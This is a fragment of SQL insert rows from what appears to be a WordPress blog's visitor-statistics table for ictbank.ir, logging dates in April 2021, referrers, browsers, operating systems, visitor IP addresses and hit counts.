(10335,'2021-04-03','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','195.206.183.117','000',0,4,0),
(10336,'2021-04-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.134','000',0,2,0),
(10337,'2021-04-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.151','000',0,6,0),
(10338,'2021-04-03','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','217.146.82.243','000',0,2,0),
(10339,'2021-04-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.202','000',0,1,0),
(10340,'2021-04-03','http://ictbank.ir/blog','Chromium','Ubuntu','Unknown',NULL,NULL,'','121.46.142.244','000',0,1,0),
(10341,'2021-04-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(10342,'2021-04-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.89.65.15','000',0,3,0),
(10343,'2021-04-03','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.164','000',0,1,0),
(10344,'2021-04-03','http://ictbank.ir/blog','Unknown','Windows','6.2',NULL,NULL,'','150.129.40.251','000',0,1,0),
(10345,'2021-04-03','http://ictbank.ir/blog','Instagram','iOS','11.4.1',NULL,NULL,'','45.152.183.188','000',0,2,0),
(10346,'2021-04-03','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','151.55.11.153','000',0,2,0),
(10347,'2021-04-03','https://duckduckgo.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','77.97.28.77','000',0,1,0),
(10348,'2021-04-03','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','94.237.70.12','000',0,2,0),
(10349,'2021-04-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.37.24.13','000',0,1,0),
(10350,'2021-04-03','http://ictbank.ir/blog','Unknown','Android','9',NULL,NULL,'','217.138.218.196','000',0,2,0),
(10351,'2021-04-03','http://ictbank.ir/blog','Unknown','iOS','11.3',NULL,NULL,'','36.106.167.165','000',0,1,0),
(10352,'2021-04-03','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','195.206.107.30','000',0,2,0),
(10353,'2021-04-03','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','137.74.24.99','000',0,2,0),
(10354,'2021-04-03','https://www.bing.com/','Edge','Android','10',NULL,NULL,'','1.32.93.136','000',0,1,0),
(10355,'2021-04-03','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','128.199.139.15','000',0,3,0),
(10356,'2021-04-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','159.65.197.62','000',0,1,0),
(10357,'2021-04-03','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','139.59.119.86','000',0,1,0),
(10358,'2021-04-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.71.80','000',0,1,0),
(10359,'2021-04-03','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','87.20.212.165','000',0,1,0),
(10360,'2021-04-03','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','185.236.42.220','000',0,2,0),
(10361,'2021-04-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(10362,'2021-04-03','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.175.34.23','000',0,9,0),
(10363,'2021-04-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','177.228.39.246','000',0,1,0),
(10364,'2021-04-03','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','196.240.57.124','000',0,2,0),
(10365,'2021-04-03','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','68.183.116.34','000',0,1,0),
(10366,'2021-04-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.214','000',0,1,0),
(10367,'2021-04-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10368,'2021-04-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10369,'2021-04-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10370,'2021-04-03','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','195.206.183.232','000',0,2,0),
(10371,'2021-04-03','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','156.223.133.119','000',0,2,0),
(10372,'2021-04-03','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','196.240.57.44','000',0,2,0),
(10373,'2021-04-04','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','54.170.96.76','000',0,1,0),
(10374,'2021-04-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','45.152.183.188','000',0,2,0),
(10375,'2021-04-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','104.140.208.252','000',0,1,0),
(10376,'2021-04-04','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','125.64.94.215','000',0,1,0),
(10377,'2021-04-04','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','159.69.215.144','000',0,1,0),
(10378,'2021-04-04','http://ictbank.ir/blog','Firefox','Windows','6.0',NULL,NULL,'','84.247.50.60','000',0,2,0),
(10379,'2021-04-04','http://ictbank.ir/blog','Chrome','Fedora','Unknown',NULL,NULL,'','107.77.92.94','000',0,1,0),
(10380,'2021-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','116.202.209.244','000',0,1,0),
(10381,'2021-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','178.159.3.173','000',0,2,0),
(10382,'2021-04-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.16.207.44','000',0,2,0),
(10383,'2021-04-04','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10384,'2021-04-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.151','000',0,3,0),
(10385,'2021-04-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','89.40.183.19','000',0,2,0),
(10386,'2021-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.192.173','000',0,1,0),
(10387,'2021-04-04','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.207.254.23','000',0,1,0),
(10388,'2021-04-04','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','196.240.57.124','000',0,2,0),
(10389,'2021-04-04','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','181.162.102.45','000',0,2,0),
(10390,'2021-04-04','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','195.206.169.196','000',0,2,0),
(10391,'2021-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.123.66','000',0,1,0),
(10392,'2021-04-04','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','62.210.172.16','000',0,1,0),
(10393,'2021-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','143.244.60.129','000',0,1,0),
(10394,'2021-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.207.175.215','000',0,1,0),
(10395,'2021-04-04','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','37.120.149.30','000',0,2,0),
(10396,'2021-04-04','http://ictbank.ir/blog','Chrome','OS X','10.9.0',NULL,NULL,'','52.15.212.3','000',0,6,0),
(10397,'2021-04-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10398,'2021-04-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(10399,'2021-04-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10400,'2021-04-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10401,'2021-04-04','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','117.73.13.142','000',0,1,0),
(10402,'2021-04-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','110.167.215.169','000',0,1,0),
(10403,'2021-04-04','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','89.238.191.203','000',0,2,0),
(10404,'2021-04-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.131.56.182','000',0,2,0),
(10405,'2021-04-04','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','178.128.190.243','000',0,1,0),
(10406,'2021-04-04','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(10407,'2021-04-04','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','195.206.107.28','000',0,2,0),
(10408,'2021-04-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(10409,'2021-04-05','http://ictbank.ir/blog','Yandex Browser','Windows','6.3',NULL,NULL,'','45.152.183.12','000',0,4,0),
(10410,'2021-04-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.151','000',0,6,0),
(10411,'2021-04-05','http://ictbank.ir/blog','Chrome','Android','4.2.1',NULL,NULL,'','185.109.170.244','000',0,2,0),
(10412,'2021-04-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,1,0),
(10413,'2021-04-05','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','185.38.150.121','000',0,2,0),
(10414,'2021-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.126.16','000',0,15,0),
(10415,'2021-04-05','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','82.102.16.132','000',0,2,0),
(10416,'2021-04-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(10417,'2021-04-05','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','52.42.79.222','000',0,1,0),
(10418,'2021-04-05','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','185.216.35.121','000',0,2,0),
(10419,'2021-04-05','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','103.91.80.2','000',0,1,0),
(10420,'2021-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.22.220','000',0,1,0),
(10421,'2021-04-05','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','77.81.139.196','000',0,2,0),
(10422,'2021-04-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','36.5.218.227','000',0,1,0),
(10423,'2021-04-05','http://ictbank.ir/blog','Android Browser','Android','4.1.1',NULL,NULL,'','185.169.233.18','000',0,2,0),
(10424,'2021-04-05','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','195.206.183.216','000',0,2,0),
(10425,'2021-04-05','https://duckduckgo.com/','Firefox','Windows','10.0',NULL,NULL,'','135.181.28.235','000',0,1,0),
(10426,'2021-04-05','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','111.43.70.254','000',0,1,0),
(10427,'2021-04-05','http://ictbank.ir/blog','Firefox','OS X','10.13',NULL,NULL,'','162.247.74.206','000',0,1,0),
(10428,'2021-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.236.203.92','000',0,2,0),
(10429,'2021-04-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.112.7.232','000',0,1,0),
(10430,'2021-04-05','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','192.227.156.26','000',0,2,0),
(10431,'2021-04-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(10432,'2021-04-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.217.204','000',0,1,0),
(10433,'2021-04-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,2,0),
(10434,'2021-04-05','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','143.244.56.143','000',0,2,0),
(10435,'2021-04-05','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','45.55.32.201','000',0,2,0),
(10436,'2021-04-05','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','37.120.149.30','000',0,2,0),
(10437,'2021-04-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','195.206.183.157','000',0,2,0),
(10438,'2021-04-06','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','195.176.3.20','000',0,1,0),
(10439,'2021-04-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','91.235.129.81','000',0,1,0),
(10440,'2021-04-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(10441,'2021-04-06','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','37.120.204.164','000',0,2,0),
(10442,'2021-04-06','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','195.206.180.4','000',0,2,0),
(10443,'2021-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.92.175','000',0,1,0),
(10444,'2021-04-06','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','34.236.202.207','000',0,6,0),
(10445,'2021-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.20.65','000',0,1,0),
(10446,'2021-04-06','http://ictbank.ir/blog','Chrome','Android','5.1',NULL,NULL,'','185.134.114.8','000',0,2,0),
(10447,'2021-04-06','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','42.114.171.229','000',0,2,0),
(10448,'2021-04-06','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','13.53.208.18','000',0,6,0),
(10449,'2021-04-06','http://ictbank.ir/blog','Unknown','Android','9',NULL,NULL,'','178.159.3.171','000',0,2,0),
(10450,'2021-04-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.12.133','000',0,1,0),
(10451,'2021-04-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.161.142','000',0,1,0),
(10452,'2021-04-06','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','194.99.105.99','000',0,2,0),
(10453,'2021-04-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10454,'2021-04-06','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.89.65.15','000',0,3,0),
(10455,'2021-04-06','http://ictbank.ir/blog','Yandex Browser','Windows','6.2',NULL,NULL,'','89.238.177.252','000',0,2,0),
(10456,'2021-04-06','https://www.linkedin.com/','Unknown','iOS','14.0',NULL,NULL,'','46.62.173.232','000',0,1,0),
(10457,'2021-04-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,2,0),
(10458,'2021-04-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10459,'2021-04-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(10460,'2021-04-06','http://ictbank.ir/blog','Android Browser','Android','2.2.1',NULL,NULL,'','185.169.233.224','000',0,2,0),
(10461,'2021-04-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','5.180.62.37','000',0,2,0),
(10462,'2021-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','163.172.67.243','000',0,1,0),
(10463,'2021-04-07','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','213.232.87.134','000',0,2,0),
(10464,'2021-04-07','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','186.91.173.91','000',0,2,0),
(10465,'2021-04-07','http://ictbank.ir/blog','UC Browser','Android','5.1.1',NULL,NULL,'','212.102.38.150','000',0,2,0),
(10466,'2021-04-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10467,'2021-04-07','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','121.5.44.33','000',0,1,0),
(10468,'2021-04-07','http://ictbank.ir/blog','Unknown','Android','7.0',NULL,NULL,'','31.13.188.140','000',0,2,0),
(10469,'2021-04-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.46.255.64','000',0,1,0),
(10470,'2021-04-07','http://ictbank.ir/blog','Instagram','Android','8.1.0',NULL,NULL,'','31.13.188.132','000',0,2,0),
(10471,'2021-04-07','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','54.189.230.128','000',0,1,0),
(10472,'2021-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.51.160','000',0,1,0),
(10473,'2021-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.248.165.177','000',0,1,0),
(10474,'2021-04-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.130','000',0,1,0),
(10475,'2021-04-07','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','95.174.67.188','000',0,2,0),
(10476,'2021-04-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','13.233.73.212','000',0,6,0),
(10477,'2021-04-07','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','52.52.190.187','000',0,6,0),
(10478,'2021-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.190.10','000',0,1,0),
(10479,'2021-04-07','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','86.106.103.244','000',0,2,0),
(10480,'2021-04-07','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','103.144.212.24','000',0,2,0),
(10481,'2021-04-07','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','151.55.40.225','000',0,1,0),
(10482,'2021-04-07','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','119.27.171.113','000',0,2,0),
(10483,'2021-04-07','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','45.133.192.204','000',0,2,0),
(10484,'2021-04-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','95.217.207.28','000',0,1,0),
(10485,'2021-04-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.212.171.75','000',0,2,0),
(10486,'2021-04-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,1,0),
(10487,'2021-04-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(10488,'2021-04-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10489,'2021-04-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(10490,'2021-04-07','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','167.172.132.13','000',0,1,0),
(10491,'2021-04-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','83.97.23.12','000',0,2,0),
(10492,'2021-04-07','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(10493,'2021-04-07','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','52.205.104.145','000',0,1,0),
(10494,'2021-04-07','http://ictbank.ir/blog/wp-login.php','Opera','Windows','6.1',NULL,NULL,'','138.204.26.146','000',0,2,0),
(10495,'2021-04-08','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(10496,'2021-04-08','http://ictbank.ir','Chrome','Linux','Unknown',NULL,NULL,'','78.46.185.145','000',0,1,0),
(10497,'2021-04-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,6,0),
(10498,'2021-04-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.3.146.243','000',0,1,0),
(10499,'2021-04-08','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','81.92.203.58','000',0,2,0),
(10500,'2021-04-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.176.188.51','000',0,6,0),
(10501,'2021-04-08','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','86.106.103.10','000',0,2,0),
(10502,'2021-04-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(10503,'2021-04-08','http://ictbank.ir/blog','Chrome','Windows','6.4',NULL,NULL,'','52.30.16.188','000',0,6,0),
(10504,'2021-04-08','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','37.120.149.30','000',0,2,0),
(10505,'2021-04-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.252.147.78','000',0,1,0),
(10506,'2021-04-08','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','151.55.40.225','000',0,2,0),
(10507,'2021-04-08','http://ictbank.ir/blog','Facebook','Android','6.0.1',NULL,NULL,'','195.206.183.216','000',0,2,0),
(10508,'2021-04-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.116.57','000',0,1,0),
(10509,'2021-04-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','222.162.120.219','000',0,1,0),
(10510,'2021-04-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','13.233.73.212','000',0,6,0),
(10511,'2021-04-08','http://ictbank.ir/blog','Android Browser','Android','2.2',NULL,NULL,'','165.231.33.148','000',0,2,0),
(10512,'2021-04-08','https://duckduckgo.com/','Firefox','Linux','Unknown',NULL,NULL,'','141.164.181.245','000',0,1,0),
(10513,'2021-04-08','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','114.55.209.25','000',0,1,0),
(10514,'2021-04-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.165.121.252','000',0,1,0),
(10515,'2021-04-08','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','97.107.137.213','000',0,1,0),
(10516,'2021-04-08','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','212.102.54.99','000',0,2,0),
(10517,'2021-04-08','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','148.255.152.25','000',0,1,0),
(10518,'2021-04-08','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','196.18.229.67','000',0,2,0),
(10519,'2021-04-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.95.45','000',0,1,0),
(10520,'2021-04-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(10521,'2021-04-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','161.35.173.199','000',0,2,0),
(10522,'2021-04-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','114.119.153.169','000',0,2,0),
(10523,'2021-04-08','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','86.106.103.244','000',0,2,0),
(10524,'2021-04-08','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','217.138.218.188','000',0,2,0),
(10525,'2021-04-08','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','89.46.62.19','000',0,87,0),
(10526,'2021-04-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(10527,'2021-04-08','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','18.208.136.243','000',0,1,0),
(10528,'2021-04-08','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','117.135.178.202','000',0,1,0),
(10529,'2021-04-08','http://ictbank.ir/blog','Samsung Internet','Android','4.4.2',NULL,NULL,'','141.98.102.252','000',0,2,0),
(10530,'2021-04-09','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Internet Explorer','Windows','5.1',NULL,NULL,'','117.135.178.202','000',0,2,0),
(10531,'2021-04-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.211.194','000',0,1,0),
(10532,'2021-04-09','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','84.247.50.42','000',0,2,0),
(10533,'2021-04-09','https://cn.bing.com/','UC Browser','Unknown','Unknown',NULL,NULL,'','123.150.181.149','000',0,1,0),
(10534,'2021-04-09','https://cn.bing.com/','UC Browser','Unknown','Unknown',NULL,NULL,'','166.111.68.168','000',0,1,0),
(10535,'2021-04-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.99.130','000',0,1,0),
(10536,'2021-04-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','89.46.62.19','000',0,2,0),
(10537,'2021-04-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(10538,'2021-04-09','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','37.120.149.30','000',0,2,0),
(10539,'2021-04-09','http://www.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.99.18.108','000',0,7,0),
(10540,'2021-04-09','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','185.236.203.92','000',0,4,0),
(10541,'2021-04-09','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,1,0),
(10542,'2021-04-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.104.193.53','000',0,1,0),
(10543,'2021-04-09','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','217.138.219.150','000',0,2,0),
(10544,'2021-04-09','http://ictbank.ir/blog','Android Browser','Android','7.0',NULL,NULL,'','114.119.133.211','000',0,2,0),
(10545,'2021-04-09','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.169.233.40','000',0,2,0),
(10546,'2021-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.116.121','000',0,1,0),
(10547,'2021-04-09','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.16.207.44','000',0,2,0),
(10548,'2021-04-09','http://ictbank.ir/blog','Safari','iOS','14.4.2',NULL,NULL,'','5.211.118.177','000',0,2,0),
(10549,'2021-04-09','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','185.235.40.24','000',0,2,0),
(10550,'2021-04-09','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.211','000',0,3,0),
(10551,'2021-04-09','http://ictbank.ir/blog','Edge','Windows','10.0',NULL,NULL,'','151.55.40.225','000',0,3,0),
(10552,'2021-04-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.227.146.72','000',0,15,0),
(10553,'2021-04-09','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','79.103.117.123','000',0,2,0),
(10554,'2021-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.184.78.91','000',0,1,0),
(10555,'2021-04-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.195.146.140','000',0,1,0),
(10556,'2021-04-09','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','45.86.15.77','000',0,1,0),
(10557,'2021-04-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','193.106.30.100','000',0,1,0),
(10558,'2021-04-09','http://ictbank.ir/blog','Facebook','Android','6.0.1',NULL,NULL,'','141.98.103.148','000',0,2,0),
(10559,'2021-04-09','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','165.22.6.220','000',0,2,0),
(10560,'2021-04-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.151.182.58','000',0,1,0),
